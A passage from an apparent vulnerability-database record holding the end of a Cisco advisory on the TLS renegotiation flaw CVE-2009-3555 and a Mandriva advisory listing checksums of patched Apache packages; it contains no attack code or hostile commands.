AND DOES NOT IMPLY\r\nANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF\r\nMERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE\r\nINFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS\r\nAT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS\r\nDOCUMENT AT ANY TIME.\r\n\r\nA stand-alone copy or Paraphrase of the text of this document that omits\r\nthe distribution URL in the following section is an uncontrolled copy,\r\nand may lack important information or contain factual errors.\r\n\r\nDistribution\r\n============\r\n\r\nThis advisory is posted on Cisco's worldwide website at:\r\n\r\nhttp://www.cisco.com/warp/public/707/cisco-sa-20091109-tls.shtml\r\n\r\nIn addition to worldwide web posting, a text version of this notice is\r\nclear-signed with the Cisco PSIRT PGP key and is posted to the following\r\ne-mail and Usenet news recipients.\r\n\r\n * cust-security-announce@cisco.com\r\n * first-bulletins@lists.first.org\r\n * bugtraq@securityfocus.com\r\n * vulnwatch@vulnwatch.org\r\n * cisco@spot.colorado.edu\r\n * cisco-nsp@puck.nether.net\r\n * full-disclosure@lists.grok.org.uk\r\n * comp.dcom.sys.cisco@newsgate.cisco.com\r\n\r\nFuture updates of this advisory, if any, will be placed on Cisco's\r\nworldwide website, but may or may not be actively announced on mailing\r\nlists or newsgroups. Users concerned about this problem are encouraged\r\nto check the above URL for any updates.\r\n\r\nRevision History\r\n================\r\n\r\n+------------------------------------------------------------+\r\n| Revision 1.0 | 2009-November-9 | Initial public release |\r\n+------------------------------------------------------------+\r\n\r\nCisco Security Procedures\r\n=========================\r\n\r\nComplete information on reporting security vulnerabilities\r\nin Cisco products, obtaining assistance with security\r\nincidents, and registering to receive security information\r\nfrom Cisco, is available on Cisco's worldwide website at\r\nhttp://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.\r\nThis includes instructions for press inquiries regarding\r\nCisco security notices. All Cisco security advisories are available at\r\nhttp://www.cisco.com/go/psirt.\r\n\r\n+--------------------------------------------------------------------\r\nCopyright 2008-2009 Cisco Systems, Inc. All rights reserved.\r\n+--------------------------------------------------------------------\r\n\r\nUpdated: Nov 09, 2009 Document ID: 111046\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (GNU/Linux)\r\n\r\niEYEARECAAYFAkr4TCsACgkQ86n/Gc8U/uDNWgCfYptXVZhz0qn2DvRh2zUtZ5EF\r\nOS4AoJediPm3/t9XqYIdrjR5PNP25iY/\r\n=SkAu\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2009-11-11T00:00:00", "published": "2009-11-11T00:00:00", "id": "SECURITYVULNS:DOC:22777", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22777", "title": "Cisco Security Advisory: Transport Layer Security Renegotiation Vulnerability", "type": "securityvulns", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-3555"], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:295\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : apache\r\n Date : November 8, 2009\r\n Affected: 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0,\r\n Enterprise Server 5.0, Multi Network Firewall 2.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n A vulnerability was discovered and corrected in apache:\r\n \r\n Apache is affected by SSL injection or man-in-the-middle attacks\r\n due to a design flaw in the SSL and/or TLS protocols. A short term\r\n solution was released Sat Nov 07 2009 by the ASF team to mitigate\r\n these problems. Apache will now reject in-session renegotiation\r\n (CVE-2009-3555).\r\n \r\n Additionally the SNI patch was upgraded for 2009.0/MES5 and 2009.1.\r\n \r\n This update provides a solution to this vulnerability.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555\r\n http://marc.info/?l=apache-httpd-announce&m=125755783724966&w=2\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2009.0:\r\n bb7817c8fd6d45007367f738772a6bf3 2009.0/i586/apache-base-2.2.9-12.5mdv2009.0.i586.rpm\r\n f8726194a60735e448281060ae4b36da 2009.0/i586/apache-devel-2.2.9-12.5mdv2009.0.i586.rpm\r\n fbe7be6f33026519e367e66e0b562340 2009.0/i586/apache-htcacheclean-2.2.9-12.5mdv2009.0.i586.rpm\r\n 138023055641f45f4a164e7c971a6a09 2009.0/i586/apache-mod_authn_dbd-2.2.9-12.5mdv2009.0.i586.rpm\r\n 5e688241469d2d4e99f5fd1dac76fa2f 2009.0/i586/apache-mod_cache-2.2.9-12.5mdv2009.0.i586.rpm\r\n 467f3e03bb9523d213e34310be245005 2009.0/i586/apache-mod_dav-2.2.9-12.5mdv2009.0.i586.rpm\r\n c19b8084698b3aab5e04c8e398105b64 2009.0/i586/apache-mod_dbd-2.2.9-12.5mdv2009.0.i586.rpm\r\n 6c387d03bcf96be55e5668d06468961a 2009.0/i586/apache-mod_deflate-2.2.9-12.5mdv2009.0.i586.rpm\r\n e349b4f55aa3d804295c70b9bddc923d 2009.0/i586/apache-mod_disk_cache-2.2.9-12.5mdv2009.0.i586.rpm\r\n 3a0aca578f2caf6bd6fde3b4ea2d3d3a 2009.0/i586/apache-mod_file_cache-2.2.9-12.5mdv2009.0.i586.rpm\r\n ae1cd7db54f7858dcd3cf46316fac109 2009.0/i586/apache-mod_ldap-2.2.9-12.5mdv2009.0.i586.rpm\r\n 6d253c599f47f2aa5f872939bd685880 2009.0/i586/apache-mod_mem_cache-2.2.9-12.5mdv2009.0.i586.rpm\r\n df04a63519e442a6c5b1c1a5dc166dce 2009.0/i586/apache-mod_proxy-2.2.9-12.5mdv2009.0.i586.rpm\r\n 0ee61ddcc9ba15f27105ac6e40b33feb 2009.0/i586/apache-mod_proxy_ajp-2.2.9-12.5mdv2009.0.i586.rpm\r\n 85bd2fd587538304570dda2ee99997c5 2009.0/i586/apache-mod_ssl-2.2.9-12.5mdv2009.0.i586.rpm\r\n d4eb614eb21ae8fcffcd2200808f733d 2009.0/i586/apache-modules-2.2.9-12.5mdv2009.0.i586.rpm\r\n b14ffea00afa59052bf9fa46d64502d7 2009.0/i586/apache-mod_userdir-2.2.9-12.5mdv2009.0.i586.rpm\r\n 0b50fbd6f26a4215c5a3a6741473f423 2009.0/i586/apache-mpm-event-2.2.9-12.5mdv2009.0.i586.rpm\r\n 84b03ef6c45c982d8e79ae3efa48a039 2009.0/i586/apache-mpm-itk-2.2.9-12.5mdv2009.0.i586.rpm\r\n f2d3438adfafbbd2916fd68e14ab1a5f 2009.0/i586/apache-mpm-peruser-2.2.9-12.5mdv2009.0.i586.rpm\r\n 81da89c424782750e7f48080b36d7b53 2009.0/i586/apache-mpm-prefork-2.2.9-12.5mdv2009.0.i586.rpm\r\n 3ed1f4255c574b656617d5fe8858067c 2009.0/i586/apache-mpm-worker-2.2.9-12.5mdv2009.0.i586.rpm\r\n ecbe5b3f18db2406073e54e58a79bebd 2009.0/i586/apache-source-2.2.9-12.5mdv2009.0.i586.rpm \r\n 702c4ff60f52c7e0576ea5532dddc9e3 2009.0/SRPMS/apache-2.2.9-12.5mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 71ed1d9246a9412d4da492a3d197540d 2009.0/x86_64/apache-base-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 2dc2a515c8dc7ed51d0a360689f69bd0 2009.0/x86_64/apache-devel-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 0e9c6e43d4fed842aed0302bd9a791b1 2009.0/x86_64/apache-htcacheclean-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 694b5febe352ece3681a78fe727f7509 2009.0/x86_64/apache-mod_authn_dbd-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 7476323e5873c8069b18eb30a6e083b4 2009.0/x86_64/apache-mod_cache-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n da79b5a011f779c6d3a2f7e7a05e87ce 2009.0/x86_64/apache-mod_dav-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 8283a2cce0751f50595b959d4a00fb82 2009.0/x86_64/apache-mod_dbd-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n ab4b98932e3afd3d93a30929007ac210 2009.0/x86_64/apache-mod_deflate-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 3e696b66694d83821c393561e1bc263e 2009.0/x86_64/apache-mod_disk_cache-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n c1fd15eb1469a629af3c532ddfa4367f 2009.0/x86_64/apache-mod_file_cache-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 62e77f84a029b5b06f97d0c68598b13c 2009.0/x86_64/apache-mod_ldap-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n f4e7eaac49d05c28b9404b5a90744ade 2009.0/x86_64/apache-mod_mem_cache-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 9a111de2c5b552a8511ff4a58c6cd8b1 2009.0/x86_64/apache-mod_proxy-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 978da0f65f1112b8e8f1f506c728b861 2009.0/x86_64/apache-mod_proxy_ajp-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 898dcdbe09b70afa7c59ca19e1130084 2009.0/x86_64/apache-mod_ssl-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 3a96f2129bbde56d1412a074362bb26f 2009.0/x86_64/apache-modules-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n f80f2d91501d2dcbf4ea6c1eff3ed4ca 2009.0/x86_64/apache-mod_userdir-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 17c9bb917167139a3b69f7fd5bb5817f 2009.0/x86_64/apache-mpm-event-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n adf43b31e6fce40e28a03dc225408f90 2009.0/x86_64/apache-mpm-itk-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 0b1ac1a128b892df681ba5712a6621f1 2009.0/x86_64/apache-mpm-peruser-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 8fc055280e0c1ef8e7c5758c855b4439 2009.0/x86_64/apache-mpm-prefork-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 093d7472250b96ef722124e082cba6a5 2009.0/x86_64/apache-mpm-worker-2.2.9-12.5mdv2009.0.x86_64.rpm\r\n 9956109782f361eb6c98dbcce8f42c7a 2009.0/x86_64/apache-source-2.2.9-12.5mdv2009.0.x86_64.rpm \r\n 702c4ff60f52c7e0576ea5532dddc9e3 2009.0/SRPMS/apache-2.2.9-12.5mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n 94e185add24c4e10121981195c930620 2009.1/i586/apache-base-2.2.11-10.6mdv2009.1.i586.rpm\r\n 7b0c7a2be7dcdd645b7593f63aac6011 2009.1/i586/apache-devel-2.2.11-10.6mdv2009.1.i586.rpm\r\n f580d6b478eef55019c7f038d3b688ab 2009.1/i586/apache-htcacheclean-2.2.11-10.6mdv2009.1.i586.rpm\r\n b10871dc531adee1ecff565108c5c6e4 2009.1/i586/apache-mod_authn_dbd-2.2.11-10.6mdv2009.1.i586.rpm\r\n a37da4e13ce3d6e89a3c51b1659d4f92 2009.1/i586/apache-mod_cache-2.2.11-10.6mdv2009.1.i586.rpm\r\n f4a0ae7521abffef05e7e9f3930b2e5f 2009.1/i586/apache-mod_dav-2.2.11-10.6mdv2009.1.i586.rpm\r\n 6b0408eedde371ac765f77ce6c21c214 2009.1/i586/apache-mod_dbd-2.2.11-10.6mdv2009.1.i586.rpm\r\n 9dc3c4df8071b8bb169404c5569d6f93 2009.1/i586/apache-mod_deflate-2.2.11-10.6mdv2009.1.i586.rpm\r\n 7ad5f4ad2f6670be4a89c0be1783aeea 2009.1/i586/apache-mod_disk_cache-2.2.11-10.6mdv2009.1.i586.rpm\r\n e695fe99060ffca44c0be14d1cdb04ed 2009.1/i586/apache-mod_file_cache-2.2.11-10.6mdv2009.1.i586.rpm\r\n 819cea0e5f59cd42dce452acd0c0c23a 2009.1/i586/apache-mod_ldap-2.2.11-10.6mdv2009.1.i586.rpm\r\n c3ffcfa7d92d1fc79267cb0a8f5b2946 2009.1/i586/apache-mod_mem_cache-2.2.11-10.6mdv2009.1.i586.rpm\r\n a3f647d9b03d0f740473f55095932593 2009.1/i586/apache-mod_proxy-2.2.11-10.6mdv2009.1.i586.rpm\r\n f9ca6ceda431aaa1d5cf65f81bb74e29 2009.1/i586/apache-mod_proxy_ajp-2.2.11-10.6mdv2009.1.i586.rpm\r\n 8310b77c823aff2f583fa50148f470ff 2009.1/i586/apache-mod_ssl-2.2.11-10.6mdv2009.1.i586.rpm\r\n 2712526500eb75864f53d9abc4ab0e51 2009.1/i586/apache-modules-2.2.11-10.6mdv2009.1.i586.rpm\r\n 2d47c9c2713d57c09dfcc80fe54b2433 2009.1/i586/apache-mod_userdir-2.2.11-10.6mdv2009.1.i586.rpm\r\n 255e720dfd9fa2cd9a44aefd58c6ba44 2009.1/i586/apache-mpm-event-2.2.11-10.6mdv2009.1.i586.rpm\r\n 7425fcb2ea8dd837c5a2354c093e764b 2009.1/i586/apache-mpm-itk-2.2.11-10.6mdv2009.1.i586.rpm\r\n 5bfda50c5f1a6bb0ccb4d3d11c8feb1e 2009.1/i586/apache-mpm-peruser-2.2.11-10.6mdv2009.1.i586.rpm\r\n 44608bdac0bf32c864183440a5aead32 2009.1/i586/apache-mpm-prefork-2.2.11-10.6mdv2009.1.i586.rpm\r\n e8a4b35f1f1200c04a3dfc29d5613d47 2009.1/i586/apache-mpm-worker-2.2.11-10.6mdv2009.1.i586.rpm\r\n e94c33087169b55d533b90b45963c6eb 2009.1/i586/apache-source-2.2.11-10.6mdv2009.1.i586.rpm \r\n a3d3eace4fc86e7ec9c1e8184d40e8d3 2009.1/SRPMS/apache-2.2.11-10.6mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2009.1/X86_64:\r\n 06575f7b7439048b85e0f95479ab6552 2009.1/x86_64/apache-base-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 09f8979708a230d8573195f5af443ba8 2009.1/x86_64/apache-devel-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n c5ac4447e3c98a555bf458d842527a8b 2009.1/x86_64/apache-htcacheclean-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 0ea0c2a44c6490641b0db3bf9f9d7409 2009.1/x86_64/apache-mod_authn_dbd-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 8230b3bb1aa3bd6e31c9825ed4954010 2009.1/x86_64/apache-mod_cache-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 7cf8275713a8ea9aaaacd76f978dc542 2009.1/x86_64/apache-mod_dav-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n e99e0b8f90e0cfb803621d33a71fcc2a 2009.1/x86_64/apache-mod_dbd-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n ded8e4e2b4890559e15874eb662f92cb 2009.1/x86_64/apache-mod_deflate-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n cdb3af03ea373fadccd2f7a626b3f78e \r\n2009.1/x86_64/apache-mod_disk_cache-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 9c4700ffcefc5b647826a6fbff0656d3 \r\n2009.1/x86_64/apache-mod_file_cache-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 122139cc3ce8849b56441f7cc8ef1604 2009.1/x86_64/apache-mod_ldap-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 8bc5b5f06bc8f8fcf7df33eb4424a232 2009.1/x86_64/apache-mod_mem_cache-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n f43fd5d1dad41550a7e083d72ae711a8 2009.1/x86_64/apache-mod_proxy-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 11fb4de40d40787954bff02fcde4e7b9 2009.1/x86_64/apache-mod_proxy_ajp-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n b762ddfe0acd03be89a37ee168f79f45 2009.1/x86_64/apache-mod_ssl-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 10b5baf1b7a17673cc7e313c45b34eca 2009.1/x86_64/apache-modules-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 8fa6579a4728ea68c20d0d66e870802c 2009.1/x86_64/apache-mod_userdir-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 3ff5897b6496f0cf1c142a158200f9d3 2009.1/x86_64/apache-mpm-event-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 7285b05e6050739f199e3ace130adbe7 2009.1/x86_64/apache-mpm-itk-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 51299d866a14149696c0435e7ec6d3a3 2009.1/x86_64/apache-mpm-peruser-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n d17d49f4fb7bb986964dcd261c600dee 2009.1/x86_64/apache-mpm-prefork-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n ad6fc82908c310d1be2ccdf4fb4d3ce3 2009.1/x86_64/apache-mpm-worker-2.2.11-10.6mdv2009.1.x86_64.rpm\r\n 4a84ec62874c0c91d36819c81d1e0767 2009.1/x86_64/apache-source-2.2.11-10.6mdv2009.1.x86_64.rpm \r\n a3d3eace4fc86e7ec9c1e8184d40e8d3 2009.1/SRPMS/apache-2.2.11-10.6mdv2009.1.src.rpm\r\n\r\n Mandriva Linux 2010.0:\r\n d1809e51bc2dbb3a655246e85a95caf0 2010.0/i586/apache-base-2.2.14-1.1mdv2010.0.i586.rpm\r\n a78c15bf2b5e5a75eb7fc8eaa725344a 2010.0/i586/apache-devel-2.2.14-1.1mdv2010.0.i586.rpm\r\n 4f464ba836031170feb0b4e661b34419 2010.0/i586/apache-htcacheclean-2.2.14-1.1mdv2010.0.i586.rpm\r\n 0f75c700952a8384685c8d9e9f31b065 2010.0/i586/apache-mod_authn_dbd-2.2.14-1.1mdv2010.0.i586.rpm\r\n 7d98bab9cd58fae7dc2eb8e7651276de 2010.0/i586/apache-mod_cache-2.2.14-1.1mdv2010.0.i586.rpm\r\n 5e627fd34f349b2bd2a89e4c9e1f6746 2010.0/i586/apache-mod_dav-2.2.14-1.1mdv2010.0.i586.rpm\r\n fdf016ba91662793af3b5a18b004f6ac 2010.0/i586/apache-mod_dbd-2.2.14-1.1mdv2010.0.i586.rpm\r\n 1088dbea44ae4db977b77198cd564125 2010.0/i586/apache-mod_deflate-2.2.14-1.1mdv2010.0.i586.rpm\r\n c553147aa3bea5f1e455a71fffdfb6bc 2010.0/i586/apache-mod_disk_cache-2.2.14-1.1mdv2010.0.i586.rpm\r\n 350885b059fb57ed93eb6e7d4f197d3f 2010.0/i586/apache-mod_file_cache-2.2.14-1.1mdv2010.0.i586.rpm\r\n 83566cb97d796f0ddece9aa90a1ac81a 2010.0/i586/apache-mod_ldap-2.2.14-1.1mdv2010.0.i586.rpm\r\n 3dd06c6346f120722de6d78cf9372079 2010.0/i586/apache-mod_mem_cache-2.2.14-1.1mdv2010.0.i586.rpm\r\n 2e6a0c297c4b443c5327567aa1c7c243 2010.0/i586/apache-mod_proxy-2.2.14-1.1mdv2010.0.i586.rpm\r\n 40771fe728d628bfbfa2287d6f4c3155 2010.0/i586/apache-mod_proxy_ajp-2.2.14-1.1mdv2010.0.i586.rpm\r\n 259eb6f83c314c314bd9fb08f90743aa 2010.0/i586/apache-mod_proxy_scgi-2.2.14-1.1mdv2010.0.i586.rpm\r\n 4592b29ddde103e442b0a55486d6b9c2 2010.0/i586/apache-mod_ssl-2.2.14-1.1mdv2010.0.i586.rpm\r\n 829f927a019c51e53edb1a4d2e98c6b4 2010.0/i586/apache-modules-2.2.14-1.1mdv2010.0.i586.rpm\r\n a9a5e28bc8dfb9d4589260d22afb846d 2010.0/i586/apache-mod_userdir-2.2.14-1.1mdv2010.0.i586.rpm\r\n e83d855a1717bdcb5b90471136f43ab2 2010.0/i586/apache-mpm-event-2.2.14-1.1mdv2010.0.i586.rpm\r\n 535262f8fa474ae09f5587a8f690fe06 2010.0/i586/apache-mpm-itk-2.2.14-1.1mdv2010.0.i586.rpm\r\n acfb57b5b632cf0c559e583c7eba5698 2010.0/i586/apache-mpm-peruser-2.2.14-1.1mdv2010.0.i586.rpm\r\n 2b096ca235d6a5965bd9e93451f9465c 2010.0/i586/apache-mpm-prefork-2.2.14-1.1mdv2010.0.i586.rpm\r\n 4799ce79cbaccfdeb627494d10e75d70 2010.0/i586/apache-mpm-worker-2.2.14-1.1mdv2010.0.i586.rpm\r\n 73047099f8f8c6c73eb0bbf912dc242c 2010.0/i586/apache-source-2.2.14-1.1mdv2010.0.i586.rpm \r\n 0dd58d7f80879f76093cfa19db00cacd 2010.0/SRPMS/apache-2.2.14-1.1mdv2010.0.src.rpm\r\n\r\n Mandriva Linux 2010.0/X86_64:\r\n 17403e4a16b7588d58353351f39b5123 2010.0/x86_64/apache-base-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n efbd8d015a1f022995d50aef8fccf514 2010.0/x86_64/apache-devel-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 06f5ab103a5f763361a76ad85f38006d 2010.0/x86_64/apache-htcacheclean-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n cef5c18678dbbdb2a995a2743923b652 2010.0/x86_64/apache-mod_authn_dbd-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 6f94396641d7461ed7ac6dee4728a16d 2010.0/x86_64/apache-mod_cache-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n d82b85275deb95aa088f2be367720974 2010.0/x86_64/apache-mod_dav-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n ff677c2a96d9827c57de63024bf3b325 2010.0/x86_64/apache-mod_dbd-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 68c028d2759cb4bbfa92be5124c9e82a 2010.0/x86_64/apache-mod_deflate-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 8e83040fd096abe63b523aafc0cd330f 2010.0/x86_64/apache-mod_disk_cache-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n aedf657533f6ef8b87755e33992ae547 2010.0/x86_64/apache-mod_file_cache-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 70b9c3abf78961d732a64c3c0ef777d8 2010.0/x86_64/apache-mod_ldap-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 9f5355474bfa4e92b625f8a151f7ad57 2010.0/x86_64/apache-mod_mem_cache-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 9c88234150d3538ac4b12c91d81fafdd 2010.0/x86_64/apache-mod_proxy-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 7b131710288ef094929d4c7c3345e38f 2010.0/x86_64/apache-mod_proxy_ajp-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 11703b4164fac113e64dd5015be06cda 2010.0/x86_64/apache-mod_proxy_scgi-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n c11b40d2a2bae457207708ba7f60f6d5 2010.0/x86_64/apache-mod_ssl-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n b4e568b230723eb8e9f4361c9023f06d 2010.0/x86_64/apache-modules-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n e814f74a0199f669684c00cd4f73e5f5 2010.0/x86_64/apache-mod_userdir-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 68bf641f60ef5972aa965f82ccbd2d2b 2010.0/x86_64/apache-mpm-event-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n e7a9752d15eba26d1ac072b2e25ee559 2010.0/x86_64/apache-mpm-itk-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n f6a733d163fc33345c5bd2e2104f4337 2010.0/x86_64/apache-mpm-peruser-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n ccdcfa4fa39683a78a43f0115cb5e299 2010.0/x86_64/apache-mpm-prefork-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n d94ec40a8272788ae9636c444f354c65 2010.0/x86_64/apache-mpm-worker-2.2.14-1.1mdv2010.0.x86_64.rpm\r\n 714f9b5de7bcc482988ceac41d186236 2010.0/x86_64/apache-source-2.2.14-1.1mdv2010.0.x86_64.rpm \r\n 0dd58d7f80879f76093cfa19db00cacd 2010.0/SRPMS/apache-2.2.14-1.1mdv2010.0.src.rpm\r\n\r\n Corporate 3.0:\r\n 445117a109396af9413dca2a69f01a0a corporate/3.0/i586/apache2-2.0.48-6.24.C30mdk.i586.rpm\r\n 30176ca39c3d65c2e50cf4c4d192dfa2 corporate/3.0/i586/apache2-common-2.0.48-6.24.C30mdk.i586.rpm\r\n 96b47f57ba9fb077da6cf27bc21e7a76 corporate/3.0/i586/apache2-devel-2.0.48-6.24.C30mdk.i586.rpm\r\n ee2e1c41ed579312e9f6365af1f475b3 corporate/3.0/i586/apache2-manual-2.0.48-6.24.C30mdk.i586.rpm\r\n 06ce15a998c23ec835a81a061455249a corporate/3.0/i586/apache2-mod_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 7abe5081d5d991b09a8484f41aeadba5 corporate/3.0/i586/apache2-mod_dav-2.0.48-6.24.C30mdk.i586.rpm\r\n 73516b134aed9853067ab93fe830513b corporate/3.0/i586/apache2-mod_deflate-2.0.48-6.24.C30mdk.i586.rpm\r\n 0d98687a38a7a9806030d8514fe9e0bc \r\ncorporate/3.0/i586/apache2-mod_disk_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 8be5990f31ccf58eb110efb0c45487b7 \r\ncorporate/3.0/i586/apache2-mod_file_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 4ddd2e15e616715ea577e1b1b010da39 corporate/3.0/i586/apache2-mod_ldap-2.0.48-6.24.C30mdk.i586.rpm\r\n bccdb965684cd1e24d054f7febc096ff \r\ncorporate/3.0/i586/apache2-mod_mem_cache-2.0.48-6.24.C30mdk.i586.rpm\r\n 345e5038a9390a07a62d39da825df65d corporate/3.0/i586/apache2-mod_proxy-2.0.48-6.24.C30mdk.i586.rpm\r\n a3e4dc57677b0728ae7c87a4a0cd4e68 corporate/3.0/i586/apache2-mod_ssl-2.0.48-6.24.C30mdk.i586.rpm\r\n c5c5fde933d0a30744a18e8fbdc677f5 corporate/3.0/i586/apache2-modules-2.0.48-6.24.C30mdk.i586.rpm\r\n da00919dd82d8db9b7fb4a63c6b44965 corporate/3.0/i586/apache2-source-2.0.48-6.24.C30mdk.i586.rpm\r\n 036643a921387b88380a3f913865ec5f corporate/3.0/i586/libapr0-2.0.48-6.24.C30mdk.i586.rpm \r\n 63e2249a390c150ab253ad9b22c3be11 corporate/3.0/SRPMS/apache2-2.0.48-6.24.C30mdk.src.rpm\r\n\r\n Corporate 3.0/X86_64:\r\n 8ed8407694197319443b1dc1400d41c6 corporate/3.0/x86_64/apache2-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 6a1163108c43c55a8a55619493d641a0 corporate/3.0/x86_64/apache2-common-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 58151e6d42ced2607936d1b1c213dd32 corporate/3.0/x86_64/apache2-devel-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 99a3c31922d94d203af88a2563d13084 corporate/3.0/x86_64/apache2-manual-2.0.48-6.24.C30mdk.x86_64.rpm\r\n b08953bf8a87cbee0241d847e6cbb6a6 \r\ncorporate/3.0/x86_64/apache2-mod_cache-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 1a5ad78b7315a7a6bfa05db7438c6eda corporate/3.0/x86_64/apache2-mod_dav-2.0.48-6.24.C30mdk.x86_64.rpm\r\n a636014239d93572e2a91ee866ae3f82 \r\ncorporate/3.0/x86_64/apache2-mod_deflate-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 9adcf4378314a767e696654b3331b457 \r\ncorporate/3.0/x86_64/apache2-mod_disk_cache-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 49ef3af0b106e5eec7fe3005fb81b5d4 \r\ncorporate/3.0/x86_64/apache2-mod_file_cache-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 958dffea2073203c81f20b9f0bea9482 \r\ncorporate/3.0/x86_64/apache2-mod_ldap-2.0.48-6.24.C30mdk.x86_64.rpm\r\n a9e65314e2fd6e892509e0da10f6eeb0 \r\ncorporate/3.0/x86_64/apache2-mod_mem_cache-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 1868d43b584b33eecf05d34e9cf3fb4c \r\ncorporate/3.0/x86_64/apache2-mod_proxy-2.0.48-6.24.C30mdk.x86_64.rpm\r\n 5be056de8b78c46a8c92215dbd5f227e corporate/3.0/x86_64/apache2-mod_ssl-2.0.48-6.24.C30mdk.x86_64.rpm\r\n e7afdce1e4b9e73f8798a7ac1651b896 corporate/3.0/x86_64/apache2-modules-2.0.48-6.24.C30mdk.x86_64.rpm\r\n af0468764dd4b41a504a767bc83cb6e0 corporate/3.0/x86_64/apache2-source-2.0.48-6.24.C30mdk.x86_64.rpm\r\n ca4b564d5e3bf167a6aa1f9ed2b4d87a corporate/3.0/x86_64/lib64apr0-2.0.48-6.24.C30mdk.x86_64.rpm \r\n 63e2249a390c150ab253ad9b22c3be11 corporate/3.0/SRPMS/apache2-2.0.48-6.24.C30mdk.src.rpm\r\n\r\n Corporate 4.0:\r\n d07e89c7290315f70eac762e5b18c87a 